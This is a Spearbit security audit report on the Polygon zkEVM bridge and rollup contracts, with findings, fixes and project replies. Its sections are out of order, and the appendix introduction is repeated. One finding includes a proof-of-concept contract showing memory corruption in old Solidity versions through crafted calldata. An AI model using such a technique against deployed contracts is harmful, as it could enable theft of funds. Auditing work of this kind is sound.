- * @param previousLastBatchSequenced Previous last batch sequenced before the current one, this is used to properly calcualte the fees
+ * @param previousLastBatchSequenced Previous last batch sequenced before the current one, this is used to properly calculate the fees

• PolygonZkEVM.sol#L276: Typo. Should be sequencer instead of seequencer.

- * @dev Emitted when the admin update the seequencer URL
+ * @dev Emitted when the admin update the sequencer URL

• PolygonZkEVM.sol#L459: Grammatical error. Should be Check global exit root exists with proper batch length. These checks are already done in the forceBatches call.
instead of Check global exit root exist, and proper batch length, this checks are already done in the forceBatches call.

- // Check global exit root exist, and proper batch length, this checks are already done in the forceBatches call
+ // Check global exit root exists with proper batch length. These checks are already done in the forceBatches call.

• PolygonZkEVM.sol#L123, PolygonZkEVM.sol#L755: Typo. Should be tries instead of trys.

- // This should be a protection against someone that trys to generate huge chunk of invalid batches, and we can't prove otherwise before the pending timeout expires
+ // This should be a protection against someone that tries to generate huge chunk of invalid batches, and we can't prove otherwise before the pending timeout expires

- * It trys to consolidate the first and the middle pending state
+ * It tries to consolidate the first and the middle pending state

• PolygonZkEVM.sol#L55: Grammatical error. Should be Struct which will be stored instead of Struct which will stored.

- * @notice Struct which will stored for every batch sequence
+ * @notice Struct which will be stored for every batch sequence

• PolygonZkEVM.sol#L71: Grammatical error. Should be will be turned off instead of will be turn off, and should be in the future instead of in a future.

- * This is a protection mechanism against soundness attacks, that will be turn off in a future
+ * This is a protection mechanism against soundness attacks, that will be turned off in the future

• PolygonZkEVM.sol#L90: Typo. Should be whether instead of wheather.

- * @param forceBatchAllowed Indicates wheather the force batch functionality is available
+ * @param forceBatchAllowed Indicates whether the force batch functionality is available

Polygon-Hermez: Solved in PR 87.

Spearbit: Verified.

+5.4.30 Enforce parameters limits in initialize() of PolygonZkEVM

Severity: Informational

Context: PolygonZkEVM.sol#L337-L370, PolygonZkEVM.sol#L1110-L1149

Description: The function initialize() of PolygonZkEVM doesn't enforce limits on trustedAggregatorTimeout and pendingStateTimeout, whereas the update functions setTrustedAggregatorTimeout() and setPendingStateTimeout() do. As the project has indicated, it might be useful to set larger values in initialize().

    function initialize(..., InitializePackedParameters calldata initializePackedParameters, ...) ... {
        trustedAggregatorTimeout = initializePackedParameters.trustedAggregatorTimeout;
        ...
        pendingStateTimeout = initializePackedParameters.pendingStateTimeout;
        ...
    }

    function setTrustedAggregatorTimeout(uint64 newTrustedAggregatorTimeout) public onlyAdmin {
        require(newTrustedAggregatorTimeout <= HALT_AGGREGATION_TIMEOUT, ...);
        ...
        trustedAggregatorTimeout = newTrustedAggregatorTimeout;
        ...
    }

    function setPendingStateTimeout(uint64 newPendingStateTimeout) public onlyAdmin {
        require(newPendingStateTimeout <= HALT_AGGREGATION_TIMEOUT, ...);
        ...
        pendingStateTimeout = newPendingStateTimeout;
        ...
    }

Recommendation: Consider enforcing the same limits in initialize() as in the update functions; this will make the code easier to reason about. If different limits are allowed on purpose, then add some comments.

Polygon-Hermez: Solved in PR 85.

Spearbit: Verified.

6 Appendix

6.1 Introduction

On March 20th of 2023, Spearbit conducted a deployment review for Polygon zkEVM. The target of the review was zkevm-contracts on commit cddde2.

Disclaimer: This security review does not guarantee against a hack.
Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.

6 Appendix

6.1 Introduction
On March 20th of 2023, Spearbit conducted a deployment review for Polygon zkEVM. The target of the review was zkevm-contracts on commit cddde2.
Disclaimer: This security review does not guarantee against a hack. It is a snapshot in time of the deployment review for Polygon zkEVM according to the specific commit. Any modifications to the code will require a new security review.

6.2 Changes after first review
Several changes have been made after the first Spearbit review conducted in January 2023 (found in the main body of this document), which include:
• A change of the verifier to FflonkVerifier;
• A way to delay setting the global exit root, as well as updateGlobalExitRoot() in PolygonZkEVMBridge;
• setForceBatchTimeout() and activateForceBatches() in PolygonZkEVM to switch on the ForceBatches mechanism at a later moment;
• Several fixes and optimizations.

6.3 Results
No security issues have been found in the above-mentioned changes.

6.3.1 Mainnet deployment
The following deployment addresses on Ethereum Mainnet were checked:
• PolygonZkEVM proxy
• PolygonZkEVM implementation
• FflonkVerifier
• PolygonZkEVMBridge proxy
• PolygonZkEVMBridge implementation
• PolygonZkEVMGlobalExitRoot proxy
• PolygonZkEVMGlobalExitRoot implementation
• PolygonZkEVMDeployer
• PolygonZkEVMTimelock
• ProxyAdmin

1 About Spearbit
Spearbit is a decentralized network of expert security engineers offering reviews and other security-related services to Web3 projects with the goal of creating a stronger ecosystem. Our network has experience on every part of the blockchain technology stack, including but not limited to protocol design, smart contracts and the Solidity compiler. Spearbit brings in untapped security talent by enabling expert freelance auditors seeking flexibility to work on interesting projects together.
Learn more about us at spearbit.com

2 Introduction
Smart contract implementation which will be used by the Polygon-Hermez zkEVM.
Disclaimer: This security review does not guarantee against a hack. It is a snapshot in time of zkEVM-Contracts according to the specific commit. Any modifications to the code will require a new security review.

3 Risk classification

Severity level       Impact: High   Impact: Medium   Impact: Low
Likelihood: high     Critical       High             Medium
Likelihood: medium   High           Medium           Low
Likelihood: low      Medium         Low              Low

3.1 Impact
• High - leads to a loss of a significant portion (>10%) of assets in the protocol, or significant harm to a majority of users.
• Medium - global losses <10% or losses to only a subset of users, but still unacceptable.
• Low - losses will be annoying but bearable; applies to things like griefing attacks that can be easily repaired or even gas inefficiencies.

3.2 Likelihood
• High - almost certain to happen, easy to perform, or not easy but highly incentivized.
• Medium - only conditionally possible or incentivized, but still relatively likely.
• Low - requires stars to align, or little-to-no incentive.

3.3 Action required for severity levels
• Critical - Must fix as soon as possible (if already deployed)
• High - Must fix (before deployment if not already deployed)
• Medium - Should fix
• Low - Could fix

4 Executive Summary
Over the course of 13 days in total, Polygon engaged with Spearbit to review the zkevm-contracts protocol. In this period of time a total of 68 issues were found.
Summary

Project Name:          Polygon
Repository:            zkevm-contracts
Commit:                5de59e...f899
Type of Project:       Cross Chain, Bridge
Audit Timeline:        Jan 9 - Jan 25
Two week fix period:   Jan 25 - Feb 8

Severity             Count   Fixed   Acknowledged
Critical Risk        0       0       0
High Risk            0       0       0
Medium Risk          3       3       0
Low Risk             16      10      6
Gas Optimizations    19      18      1
Informational        30      19      11
Total Issues Found   68      50      18

5 Findings

5.1 Medium Risk

5.1.1 Funds can be sent to a non existing destination
Severity: Medium Risk
Context: PolygonZkEVMBridge.sol#L129-L257
Description: The functions bridgeAsset() and bridgeMessage() do check that the destination network is different from the current network. However, they don't check whether the destination network exists. If the wrong networkId is accidentally given as a parameter, the funds are sent to a non-existing network. If that network were deployed in the future, the funds could be recovered; in the meantime, however, they are inaccessible and thus lost for the sender and recipient. Note: other bridges usually have validity checks on the destination.

function bridgeAsset(...) ... {
    require(destinationNetwork != networkID, ...);
    ...
}

function bridgeMessage(...) ... {
    require(destinationNetwork != networkID, ...);
    ...
}

Recommendation: Check that the destination networkID is a valid destination.
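A minimal sketch of such a check, assuming a hypothetical networkCount value maintained as new networks are added (the variable name and revert string are illustrative, not part of the codebase):

// Hypothetical counter of deployed networks, updated by governance
uint32 public networkCount;

function bridgeAsset(...) ... {
    require(destinationNetwork != networkID, ...);
    // Reject destinations that do not (yet) exist
    require(
        destinationNetwork < networkCount,
        "PolygonZkEVMBridge::bridgeAsset: invalid destinationNetwork"
    );
    ...
}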
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.

5.1.2 Fee on transfer tokens
Severity: Medium Risk
Context: PolygonZkEVMBridge.sol#L171
Description: The bridge contract will not work properly with fee-on-transfer tokens:
1. User A bridges a fee-on-transfer token A from Mainnet to rollup R1 for amount X.
2. In that case X - fees will be received by the bridge contract on Mainnet, but the deposit receipt of the full amount X will be stored in the Merkle tree.
3. The amount is claimed on R1, a new TokenPair for token A is generated and the full amount X is minted to User A.
4. Now the full amount is bridged back again to Mainnet.
5. When a claim is made on Mainnet, the contract tries to transfer amount X, but since it only received X - fees it will use the funds of other users, which eventually causes a DoS for other users using the same token.
Recommendation: Use the exact amount which is transferred to the contract, which can be obtained using the sample code below:

uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(address(this));
IERC20Upgradeable(token).safeTransferFrom(address(msg.sender), address(this), amount);
uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(address(this));
uint256 transferredAmount = balanceAfter - balanceBefore;
// if you don't want to support fee on transfer tokens use the below:
require(transferredAmount == amount, ...);
// use transferredAmount if you want to support fee on transfer tokens

Polygon-Hermez: Solved in PR 87. To protect against reentrancy with ERC777 tokens, a check for reentrancy MUST be added. Solved in PR 91.
Spearbit: Verified.

5.1.3 Function consolidatePendingState() can be executed during emergency state
Severity: Medium Risk
Context: PolygonZkEVM.sol#L783-L793
Description: The function consolidatePendingState() can be executed by everyone, even when the contract is in an emergency state. This might interfere with cleaning up the emergency. Most other functions are disallowed during an emergency state.

function consolidatePendingState(uint64 pendingStateNum) public {
    if (msg.sender != trustedAggregator) {
        require(isPendingStateConsolidable(pendingStateNum), ...);
    }
    _consolidatePendingState(pendingStateNum);
}

Recommendation: Consider adding the following, which also improves consistency:

function consolidatePendingState(uint64 pendingStateNum) public {
    if (msg.sender != trustedAggregator) {
+       require(!isEmergencyState, ...);
        require(isPendingStateConsolidable(pendingStateNum), ...);
    }
    _consolidatePendingState(pendingStateNum);
}

Polygon-Hermez: Solved in PR 87.
Spearbit: Verified.

5.2 Low Risk

5.2.1 Sequencers can re-order forced and non-forced batches
Severity: Low Risk
Context: PolygonZkEVM.sol#L409-L533
Description: Sequencers have a certain degree of control over how non-forced and forced batches are ordered. Consider the case where we have two sets of batches: non-forced (NF) and forced (F). A sequencer can order the sets (F1, F2) and (NF1, NF2) in any order, as long as the internal order of the forced and the non-forced batch sets is kept. I.e. a sequencer can sequence these batches as F1 -> NF1 -> NF2 -> F2, but they can also equivalently sequence them as NF1 -> F1 -> F2 -> NF2.
Recommendation: Ensure this behavior is understood and consider what impact decentralizing the sequencer role would have on bridge users.
Polygon-Hermez: Added comments to function forceBatch() in PR 85.
Spearbit: Acknowledged.

5.2.2 Check length of smtProof
Severity: Low Risk
Context: DepositContract.sol#L90-L112
Description: An obscure Solidity bug could be triggered via a call in Solidity 0.4.x. Current Solidity versions revert with panic 0x41. The problem could occur if unbounded memory arrays were used. This situation happens to be the case, as verifyMerkleProof() (and all the functions that call it) don't check the length of the array (or loop over the entire array). It also depends on memory variables (for example structs) being used in the functions; that doesn't seem to be the case. Here is a POC of the issue which can be run in Remix:

// SPDX-License-Identifier: MIT
// based on https://github.com/paradigm-operations/paradigm-ctf-2021/blob/master/swap/private/Exploit.sol
pragma solidity ^0.4.24; // only works with low solidity version
import "hardhat/console.sol";

contract test {
    struct Overlap {
        uint field0;
    }

    function mint(uint[] memory amounts) public {
        Overlap memory v;
        console.log("before: ", amounts[0]);
        v.field0 = 567;
        console.log("after: ", amounts[0]); // would expect to be 0 however is 567
    }

    function go() public {
        // this part requires the low solidity version
        bytes memory payload = abi.encodeWithSelector(this.mint.selector, 0x20, 2**251);
        bool success = address(this).call(payload);
        console.log(success);
    }
}

Recommendation: Although it currently isn't exploitable, to be sure consider adding a check on the length of smtProof:

function verifyMerkleProof(..., bytes32[] memory smtProof, ...) public pure returns (bool) {
+   require(smtProof.length == _DEPOSIT_CONTRACT_TREE_DEPTH);
    ...
}

Or use a fixed-size array:

function verifyMerkleProof(..., bytes32[_DEPOSIT_CONTRACT_TREE_DEPTH] memory smtProof, ...) ... {
}

Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.

5.2.3 Transaction delay due to free claimAsset() transactions
Severity: Low Risk
Context: batchbuilder.go#L29-L122
Description: The sequencer first processes the free claimAsset() transactions and then the rest. This might delay other transactions if there are many free claimAsset() transactions.
As these transactions have to be initiated on mainnet, the gas costs there reduce this problem. However, once multiple rollups are supported in the future, the transactions could originate from another rollup with low gas costs.

func (s *Sequencer) tryToProcessTx(ctx context.Context, ticker *time.Ticker) {
    ...
    appendedClaimsTxsAmount := s.appendPendingTxs(ctx, true, 0, getTxsLimit, ticker) // claimAsset() transactions
    appendedTxsAmount := s.appendPendingTxs(ctx, false, minGasPrice.Uint64(), getTxsLimit-appendedClaimsTxsAmount, ticker) + appendedClaimsTxsAmount
    ...
}

Recommendation: Consider limiting the amount of free claimAsset() transactions added to a batch.
Polygon-Hermez: This is important to consider once multiple rollups are implemented. For now, we'll leave it like this.
Spearbit: Acknowledged.

5.2.4 Misleading token addresses
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L272-L373
Description: The function claimAsset() deploys TokenWrapped contracts via create2 and a salt. This salt is based on the originTokenAddress. By crafting specific originTokenAddresses, it's possible to create vanity addresses on the other chain. These addresses could be similar to those of legitimate tokens and might mislead users. Note: it is also possible to directly deploy tokens on the other chain with vanity addresses (e.g. without using the bridge).

function claimAsset(...) ... {
    ...
    bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress));
    ...
    TokenWrapped newWrappedToken = (new TokenWrapped){salt: tokenInfoHash}(name, symbol, decimals);
    ...
}

Recommendation: Have a way for users to determine legitimate bridged tokens, for example via tokenlists.
Polygon-Hermez: Our front end will show a list of supported tokens, and users will also be able to import custom tokens (the same way it happens in a lot of DEXs). But of course we cannot control the use of all the dapps deployed. Dapps that integrate with our system should be able to import our token list or calculate the addresses. There are view functions to help calculate an L2 address (precalculatedWrapperAddress) given a mainnet token address and metadata. A user/dapp can also easily check the corresponding L1 token address of every L2 token by calling wrappedTokenToTokenInfo and verifying that originTokenAddress is in their Mainnet token list, for example.
Spearbit: Acknowledged.

5.2.5 Limit amount of gas for free claimAsset() transactions
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L272-L436
Description: Function claimAsset() is subsidized (e.g. its gas price is 0) on L2 and allows calling a custom contract. This could be misused to execute elaborate transactions for free. Note: safeTransfer could also call a custom contract that has been crafted before and bridged to L1.
Note: this is implemented in the Go code, which detects transactions to the bridge with function bridgeClaimMethodSignature == "0x7b6323c1", which is the selector of claimAsset(). See function IsClaimTx() in transaction.go.

function claimAsset(...) ... {
    ...
    (bool success, ) = destinationAddress.call{value: amount}(new bytes(0));
    ...
    IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress, amount);
    ...
}

Recommendation: Limit the amount of gas supplied to claimAsset() while doing free transactions. Note: a PR is being made to limit the available gas: PR 1551.
Polygon-Hermez: We will take this into consideration in the current and future implementation of the sequencer.
Spearbit: Acknowledged.

5.2.6 What to do with funds that can't be delivered
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L272-L436
Description: Both claimAsset() and claimMessage() might revert in different locations (even after retrying). Although the funds stay in the bridge, they are not accessible by the originator or recipient of the bridge action, so they are essentially lost for both. Some other bridges have recovery addresses where the funds can be delivered instead. Here are several potential revert situations:

function claimAsset(...) ... {
    ...
    (bool success, ) = destinationAddress.call{value: amount}(new bytes(0));
    require(success, ...);
    ...
    IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress, amount);
    ...
    TokenWrapped newWrappedToken = (new TokenWrapped){salt: tokenInfoHash}(name, symbol, decimals);
    ...
}

function claimMessage(...) ... {
    ...
    (bool success, ) = destinationAddress.call{value: amount}(
        abi.encodeCall(
            IBridgeMessageReceiver.onMessageReceived,
            (originAddress, originNetwork, metadata)
        )
    );
    require(success, "PolygonZkEVMBridge::claimMessage: Message failed");
    ...
}

Recommendation: Consider having a recovery mechanism for funds that can't be delivered. For example, the funds could be delivered to an EOA recovery address on the destination chain. This requires adding more info to the merkle root and also needs checks that senders add a recovery address; otherwise there isn't always a recovery address. It could be implemented via a function (e.g. recoverAsset()) where the recovery address initiates a transaction (similar to claimAsset()) and the funds are delivered to the recovery address.
Polygon-Hermez: We decided that such a mechanism is not worth implementing, since the user could also put an invalid recovery address and it adds too much overhead. If the user puts an invalid address as destination address, either by mistake or by using a smart contract that cannot receive funds, the funds will be lost.
Spearbit: Acknowledged.

5.2.7 Inheritance structure does not openly support contract upgrades
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L18-L21
Description: The Solidity compiler uses C3 linearisation to determine the order of contract inheritance. This is performed left to right, with all child contracts considered before the parent contract. Storage slot assignment for PolygonZkEVMBridge is as follows: Initializable -> DepositContract -> EmergencyManager -> PolygonZkEVMBridge. Initializable.sol already reserves storage slots for future upgrades, and because PolygonZkEVMBridge.sol is inherited last, storage slots can be safely appended. However, the two intermediate contracts, DepositContract.sol and EmergencyManager.sol, cannot handle storage upgrades.
Recommendation: Consider introducing a storage gap to the two intermediate contracts.
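A minimal sketch of the usual OpenZeppelin-style gap, appended to the storage layout of each intermediate contract (the size 50 is the customary choice, not a requirement):

contract DepositContract is ... {
    // ... existing storage variables ...

    // Reserve slots so future versions can append storage variables
    // without shifting the layout of inheriting contracts.
    uint256[50] private __gap;
}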
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.

5.2.8 Function calculateRewardPerBatch() could divide by 0
Severity: Low Risk
Context: PolygonZkEVM.sol#L1488-L1498
Description: The function calculateRewardPerBatch() performs a division by totalBatchesToVerify. If there are currently no batches to verify, totalBatchesToVerify is 0 and the transaction reverts. When calculateRewardPerBatch() is called from _verifyBatches() this doesn't happen, as it would revert earlier. However, when the function is called externally this situation could occur.

function calculateRewardPerBatch() public view returns (uint256) {
    ...
    uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch();
    return currentBalance / totalBatchesToVerify;
}

Recommendation: Consider changing the code to something like:

function calculateRewardPerBatch() public view returns (uint256) {
    ...
    uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch();
+   if (totalBatchesToVerify == 0) return 0;
    return currentBalance / totalBatchesToVerify;
}

Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.

5.2.9 Limit gas usage of _updateBatchFee()
Severity: Low Risk
Context: PolygonZkEVM.sol#L839-L908
Description: The function _updateBatchFee() loops through all unverified batches. Normally this would be 30 min / 5 min ~ 6 batches. Assume the aggregator malfunctions and verifyBatches() is only called after one week, which calls _updateBatchFee(). Then there could be 7 * 24 * 60 min / 5 min ~ 2016 batches. The function verifyBatches() limits this to MAX_VERIFY_BATCHES == 1000. This might still result in an out-of-gas error, possibly requiring multiple verifyBatches() attempts with a smaller number of batches, which would increase the network outage.

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
    while (currentBatch != currentLastVerifiedBatch) {
        ...
        if (block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget) {
            ...
        }
        ...
    }
    ...
}

Recommendation: Optimize the function _updateBatchFee() and/or check the available amount of gas and simplify the algorithm to update the batchFee. As suggested by the project, the optimization below could be made. This alleviates the problem because only a limited amount of batches will be below target; the bulk will be above target, but they won't be looped over.

// Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET
if (
    block.timestamp - currentSequencedBatchData.sequencedTimestamp <  // Notice the changed <
    veryBatchTimeTarget
) {
    totalBatchesBelowTarget +=  // Notice now it's Below
        currentBatch - currentSequencedBatchData.previousLastBatchSequenced;
} else {
    break; // Since the rest of the batches will be above!
}

Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.

5.2.10 Keep precision in _updateBatchFee()
Severity: Low Risk
Context: PolygonZkEVM.sol#L839-L908
Description: Function _updateBatchFee() uses a trick to prevent losing precision in the calculation of accDivisor. The value accDivisor includes an extra multiplication by batchFee, which is undone when doing batchFee = (batchFee * batchFee) / accDivisor, because this also contains an extra multiplication by batchFee. However, if batchFee happens to reach a small value (also see issue "Minimum and maximum value for batchFee"), the trick doesn't work that well.
In the extreme case of batchFee == 0, a division by 0 would take place, resulting in a revert; luckily this doesn't happen in practice.

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
    uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
    batchFee = (batchFee * batchFee) / accDivisor;
    ...
}

Recommendation: Replace the multiplication factor with a fixed and sufficiently large value, for example in the following way:

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
-   uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
-   batchFee = (batchFee * batchFee) / accDivisor;
+   uint256 accDivisor = (1E18 * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
+   batchFee = (1E18 * batchFee) / accDivisor;
    ...
}

Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.

5.2.11 Minimum and maximum value for batchFee
Severity: Low Risk
Context: PolygonZkEVM.sol#L839-L908
Description: Function _updateBatchFee() updates the batchFee depending on the batch time target. If the batch times are repeatedly below or above the target, the batchFee could shrink or grow without limit. If the batchFee gets too low, problems with the economic incentives might arise. If the batchFee gets too high, overflows might occur; the fee might also be too high to be practically payable. Although not very likely to occur in practice, it is probably worth the trouble to implement limits.

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
    if (totalBatchesBelowTarget < totalBatchesAboveTarget) {
        ...
        batchFee = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
    } else {
        ...
        uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
        batchFee = (batchFee * batchFee) / accDivisor;
    }
}

Recommendation: Consider implementing a minimum and maximum value for batchFee.
Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.

5.2.12 Bridge deployment will fail if initialize() is front-run
Severity: Low Risk
Context: deployContracts.js
Description: By default, Hardhat will deploy transparent upgradeable proxies when calling upgrades.deployProxy() with no type specified. This function accepts data which is used to initialize the state of the contract being deployed. However, because the zkEVM bridge script utilizes the output of each contract address on deployment, it is not trivial to atomically deploy and initialize contracts. As a result, there is a small time window available for attackers to front-run calls to initialize the necessary bridge contracts, allowing them to temporarily DoS the deployment process.
Recommendation: Consider pre-calculating all contract addresses prior to proxy deployment so each contract can be initialized atomically.
Polygon-Hermez: We are currently deciding the best way to make a deterministic deployment for the bridge, but will take this into account for sure.
Spearbit: Acknowledged.

5.2.13 Add input validation for the setVeryBatchTimeTarget method
Severity: Low Risk
Context: PolygonZkEVM.sol#L1171-L1176
Description: The setVeryBatchTimeTarget method in PolygonZkEVM accepts a uint64 newVeryBatchTimeTarget argument to set the veryBatchTimeTarget. This variable has a value of 30 minutes in the initialize method, so it is expected that it shouldn't hold a very big value, as it is compared to a timestamp difference in _updateBatchFee. Since there is no upper bound for the value of the newVeryBatchTimeTarget argument, it is possible (for example due to fat-fingering the call) that an admin passes a big value (up to type(uint64).max), which will result in wrong calculations in _updateBatchFee.
Recommendation: Add a sensible upper bound for the value of newVeryBatchTimeTarget, for example 1 day.
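A minimal sketch of such a bound, assuming the setter is admin-gated as described above (the 1-day limit and revert string are illustrative):

function setVeryBatchTimeTarget(uint64 newVeryBatchTimeTarget) public onlyAdmin {
    // Reject values that would distort the fee calculation in _updateBatchFee()
    require(
        newVeryBatchTimeTarget <= 1 days,
        "PolygonZkEVM::setVeryBatchTimeTarget: newVeryBatchTimeTarget too large"
    );
    veryBatchTimeTarget = newVeryBatchTimeTarget;
    emit SetVeryBatchTimeTarget(newVeryBatchTimeTarget);
}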
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.

5.2.14 Single-step process for critical ownership transfer
Severity: Low Risk
Context: PolygonZkEVM.sol#L1182, OwnableUpgradeable.sol#L74
Description: If the nominated newAdmin or newOwner account is not a valid account, the owner or admin risks locking themselves out.

function setAdmin(address newAdmin) public onlyAdmin {
    admin = newAdmin;
    emit SetAdmin(newAdmin);
}

function transferOwnership(address newOwner) public virtual onlyOwner {
    require(newOwner != address(0), "Ownable: new owner is the zero address");
    _transferOwnership(newOwner);
}

Recommendation: Consider implementing a two-step process where the owner or admin nominates an account, and the nominated account calls an acceptTransfer() function for the transfer to succeed.
Polygon-Hermez: Solved for admin in PR 87. The owner is intended to be a multisig during a bootstrap period and will be renounced afterwards. We consider acceptTransfer() to be overkill for this address.
Spearbit: Verified and Acknowledged.

5.2.15 Ensure no native asset value is sent in payable method that can handle ERC20 transfers as well
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L154-L187
Description: The bridgeAsset method of PolygonZkEVMBridge is marked payable, as it can work both with the native asset and with ERC20 tokens. In the code path where it is checked that the token is not the native asset but an ERC20 token, it is not validated that the user did not actually provide value with the transaction. The likelihood of this happening is pretty low, since it requires a user error, but if it does happen then the native asset value will be stuck in the PolygonZkEVMBridge contract.
Recommendation: Ensure that no native asset value is sent when the bridged asset is an ERC20 token by adding the following code to the code path of the ERC20 bridging:

require(msg.value == 0, "PolygonZkEVMBridge::bridgeAsset: Expected zero native asset value when bridging ERC20 tokens");

You can also use an if statement and a custom error instead of a require statement.
Polygon-Hermez: Solved in PR 87.
Spearbit: Verified.

5.2.16 Calls to the name, symbol and decimals functions will be unsafe for non-standard ERC20 tokens
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L181-185
Description: The bridgeAsset method of PolygonZkEVMBridge accepts an address token argument and later calls its name, symbol and decimals methods. There are two potential problems with this:
1. Those methods are not mandatory in the ERC20 standard, so there can be ERC20-compliant tokens that do not have either or all of the name, symbol or decimals methods. They will not be usable with the protocol, because the calls will revert.
2. There are tokens that use bytes32 instead of string as the value type of their name and symbol storage variables and their getter functions (an example is MKR). This can cause reverts when trying to consume metadata from those tokens.
Also, see weird-erc20 for nonstandard tokens.
Recommendation: For the first problem, a simple solution is to use a low-level staticcall for those method calls and, if they are unsuccessful, to use some default values. For the second problem it would be best to again do a low-level staticcall and then use an external library that checks if the returned data is of type string and, if not, to cast it to such. Also, see MasterChefJoeV3 as an example of a possible solution.
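A sketch of this best-effort approach (the helper names and default values are illustrative, not the project's implementation):

function _safeSymbol(address token) internal view returns (string memory) {
    (bool ok, bytes memory data) = token.staticcall(abi.encodeWithSignature("symbol()"));
    return ok ? _returnDataToString(data) : "NO_SYMBOL"; // default when the call reverts
}

function _safeDecimals(address token) internal view returns (uint8) {
    (bool ok, bytes memory data) = token.staticcall(abi.encodeWithSignature("decimals()"));
    return (ok && data.length == 32) ? abi.decode(data, (uint8)) : 18; // default to 18
}

// Handles both standard ABI-encoded string returns and MKR-style bytes32 returns.
function _returnDataToString(bytes memory data) internal pure returns (string memory) {
    if (data.length >= 64) {
        return abi.decode(data, (string));
    } else if (data.length == 32) {
        // bytes32: copy the non-zero prefix into a string
        uint256 len = 0;
        while (len < 32 && data[len] != bytes1(0)) {
            len++;
        }
        bytes memory out = new bytes(len);
        for (uint256 i = 0; i < len; i++) {
            out[i] = data[i];
        }
        return string(out);
    }
    return "NOT_VALID";
}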
Polygon-Hermez: Solved in PR 90 and PR 91.
Spearbit: Verified.

5.3 Gas Optimization

5.3.1 Use calldata instead of memory for array parameters
Severity: Gas Optimization
Context: PolygonZkEVMBridge.sol#L272-L373, PolygonZkEVMBridge.sol#L520-L581, DepositContract.sol#L90-L112
Description: The code frequently uses memory arrays for externally called functions. Some gas could be saved by making these calldata. The calldata can also be cascaded to internal functions that are called from the external functions.

function claimAsset(bytes32[] memory smtProof) public {
    ...
    _verifyLeaf(smtProof);
    ...
}

function _verifyLeaf(bytes32[] memory smtProof) internal {
    ...
    verifyMerkleProof(smtProof);
    ...
}

function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal {
    ...
}

Recommendation: Consider changing the code to:

-function claimAsset(bytes32[] memory smtProof) public {
+function claimAsset(bytes32[] calldata smtProof) public {
    ...
    _verifyLeaf(smtProof);
    ...
}

-function _verifyLeaf(bytes32[] memory smtProof) internal {
+function _verifyLeaf(bytes32[] calldata smtProof) internal {
    ...
    verifyMerkleProof(smtProof);
    ...
}

-function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal {
+function verifyMerkleProof(..., bytes32[] calldata smtProof, ...) internal {
    ...
}

Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.

5.3.2 Optimize networkID == MAINNET_NETWORK_ID
Severity: Gas Optimization
Context: PolygonZkEVMBridge.sol#L520-L581, PolygonZkEVMBridge.sol#L69-L77
Description: The value for networkID is defined in initialize() and MAINNET_NETWORK_ID is constant. So networkID == MAINNET_NETWORK_ID can be calculated in initialize() and stored to save some gas. It is even cheaper if networkID is immutable, which would require adding a constructor.

uint32 public constant MAINNET_NETWORK_ID = 0;
uint32 public networkID;

function initialize(uint32 _networkID, ...) public virtual initializer {
    networkID = _networkID;
    ...
}

function _verifyLeaf(...) ... {
    ...
    if (networkID == MAINNET_NETWORK_ID) {
        ...
    } else {
        ...
    }
}

Recommendation: Consider calculating networkID == MAINNET_NETWORK_ID in initialize() or, preferably, a constructor.
Polygon-Hermez: We decided to go for a deterministic deployment for the PolygonZkEVMBridge contract, therefore we prefer not to use immutables in this contract. When implemented without immutable, the resulting code is less optimal.
Spearbit: Acknowledged.

5.3.3 Optimize updateExitRoot()
Severity: Gas Optimization
Context: PolygonZkEVMGlobalExitRoot.sol#L54-L75
Description: The function updateExitRoot() accesses the global variables lastMainnetExitRoot and lastRollupExitRoot multiple times. This can be optimized using temporary variables.

function updateExitRoot(bytes32 newRoot) external {
    ...
    if (msg.sender == rollupAddress) {
        lastRollupExitRoot = newRoot;
    }
    if (msg.sender == bridgeAddress) {
        lastMainnetExitRoot = newRoot;
    }
    bytes32 newGlobalExitRoot = keccak256(
        abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot)
    );
    if ( ... ) {
        ...
        emit UpdateGlobalExitRoot(lastMainnetExitRoot, lastRollupExitRoot);
    }
}

Recommendation: Consider changing the code to something like:

function updateExitRoot(bytes32 newRoot) external {
    ...
    bytes32 cm = lastMainnetExitRoot;
    bytes32 cr = lastRollupExitRoot;
    if (msg.sender == rollupAddress) {
        lastRollupExitRoot = cr = newRoot;
    }
    if (msg.sender == bridgeAddress) {
